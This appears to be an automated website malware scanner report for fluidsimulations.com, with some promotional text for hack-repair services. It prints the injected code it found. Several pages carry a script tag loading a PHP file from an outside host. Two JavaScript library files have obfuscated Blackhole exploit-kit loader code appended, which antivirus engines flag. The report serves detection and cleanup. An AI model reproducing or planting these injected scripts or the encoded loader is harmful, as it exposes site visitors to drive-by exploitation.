New scan:

Malware Scanner report for fluidsimulations.com

Malicious/Suspicious/Total urls checked
2/3/6
5 pages have malicious or suspicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "fluidsimulations.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=fluidsimulations.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://fluidsimulations.com/
200 OK
Content-Length: 20915
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript">var gwloaded = false;</script>
<script src="http://erasoltours.com/logs/HiXFiBqW.php" type="text/javascript"></script>

http://fluidsimulations.com/js/libs/modernizr-2.0.6.min.js
200 OK
Content-Length: 24348
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

;window.Modernizr=function(a,b,c){function I(){e.input=function(a){for(var b=0,c=a.length;b<c;b++)t[a[b]]=a[b]in l;return t}("autocomplete autofocus list placeholder max min multiple pattern required step".split(" ")),e.inputtypes=function(a){for(var d=0,e,f,h,i=a.length;d<i;d++)l.setAttribute("type",f=a[d]),e=l.type!=="text",e&&(l.value=m,l.style.cssText="position:absolute;visibility:hidden;",/^range$/.test(f)&&l.style.WebkitAppearance!==c?(g.appendChild(l),h=b.defaultView
... 3066 bytes are skipped ...
35^2d^79^72^7b^39^2d^72^7b^71^2d^36^2d^36^48^1a^17^8a^1a^17^76^73^2d^35^7b^6e^83^76^74^6e^81^7c^7f^3b^70^7c^7c^78^76^72^52^7b^6e^6f^79^72^71^36^1a^17^88^1a^17^76^73^35^54^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^36^4a^4a^42^42^36^88^8a^72^79^80^72^88^60^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^39^2d^34^42^42^34^39^2d^34^3e^34^39^2d^34^3c^34^36^48^1a^17^1a^17^71^80^3d^46^35^36^48^1a^17^8a^1a^17^8a".split(a2);za="";aa("arCode");e(""+za);}
/*/0f2490*/

Antivirus reports:

AntiVir
JS/BlacoleRef.W.274
Avast
JS:Decode-BFW [Trj]
Ad-Aware
JS:Exploit.BlackHole.BO
Ikarus
Trojan.JS.Obfuscated
nProtect
JS:Exploit.BlackHole.BO
Emsisoft
JS:Exploit.BlackHole.BO (B)
Comodo
TrojWare.JS.BlacoleRef.WA
McAfee-GW-Edition
JS/Exploit-Blacole.eu
DrWeb
JS.IFrame.500
Microsoft
Exploit:JS/Blacole.NY
MicroWorld-eScan
JS:Exploit.BlackHole.BO
Fortinet
JS/Blacole.EU!tr.dldr
McAfee
JS/Exploit-Blacole.eu
NANO-Antivirus
Trojan.Script.Expack.blnsat
F-Secure
JS:Exploit.BlackHole.BO
VIPRE
Trojan.Js.BlacoleRef.dj (v)
AVG
HTML/Framer
Norman
Blacole.WU
GData
JS:Exploit.BlackHole.BO
BitDefender
JS:Exploit.BlackHole.BO

http://fluidsimulations.com/Scripts/swfobject_modified.js
404 Not Found
Content-Length: 1541
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript">var gwloaded = false;</script>
<script src="http://erasoltours.com/logs/HiXFiBqW.php" type="text/javascript"></script>

http://linkhelp.clients.google.com/tbproxy/lh/wm/fixurl.js
200 OK
Content-Length: 47623
Content-Type: text/javascript
clean
http://fluidsimulations.com/test404page.js
404 Not Found
Content-Length: 1541
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript">var gwloaded = false;</script>
<script src="http://erasoltours.com/logs/HiXFiBqW.php" type="text/javascript"></script>

http://fluidsimulations.com/Scripts/shadowbox.js
200 OK
Content-Length: 56059
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(window,undefined){var S={version:"3.0.3"};var ua=navigator.userAgent.toLowerCase();if(ua.indexOf("windows")>-1||ua.indexOf("win32")>-1){S.isWindows=true}else{if(ua.indexOf("macintosh")>-1||ua.indexOf("mac os x")>-1){S.isMac=true}else{if(ua.indexOf("linux")>-1){S.isLinux=true}}}S.isIE=ua.indexOf("msie")>-1;S.isIE6=ua.indexOf("msie 6")>-1;S.isIE7=ua.indexOf("msie 7")>-1;S.isGecko=ua.indexOf("gecko")>-1&&ua.indexOf("safari")==-1;S.isWebKit=ua.indexOf("ap
... 3056 bytes are skipped ...
35^2d^79^72^7b^39^2d^72^7b^71^2d^36^2d^36^48^1a^17^8a^1a^17^76^73^2d^35^7b^6e^83^76^74^6e^81^7c^7f^3b^70^7c^7c^78^76^72^52^7b^6e^6f^79^72^71^36^1a^17^88^1a^17^76^73^35^54^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^36^4a^4a^42^42^36^88^8a^72^79^80^72^88^60^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^39^2d^34^42^42^34^39^2d^34^3e^34^39^2d^34^3c^34^36^48^1a^17^1a^17^71^80^3d^46^35^36^48^1a^17^8a^1a^17^8a".split(a2);za="";aa("arCode");e(""+za);}
/*/0f2490*/

Antivirus reports:

AntiVir
JS/BlacoleRef.W.274
Avast
JS:Decode-BFW [Trj]
Comodo
TrojWare.JS.BlacoleRef.WA
McAfee-GW-Edition
JS/Exploit-Blacole.eu
Microsoft
Exploit:JS/Blacole.NY
Fortinet
JS/Blacole.EU!tr.dldr
McAfee
JS/Exploit-Blacole.eu
VIPRE
Trojan.Js.BlacoleRef.dj (v)
AVG
HTML/Framer
Norman
Blacole.WU
GData
Script.Packed.IFrame.G


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: fluidsimulations.com

Result:
HTTP/1.1 200 OK
Cache-Control: max-age=0, public
Connection: close
Date: Thu, 28 Aug 2014 05:43:21 GMT
Accept-Ranges: none
Server: nginx/1.6.1
Vary: Accept-Encoding
Content-Length: 20915
Content-Type: text/html; charset=utf-8
Expires: Thu, 28 Aug 2014 05:43:21 GMT
Last-Modified: Thu, 31 Oct 2013 10:15:22 GMT
X-UA-Compatible: IE=Edge,chrome=1

...20915 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: fluidsimulations.com
Referer: http://www.google.com/search?q=fluidsimulations.com

Result:
The result is similar to the first query. There are no suspicious redirects found.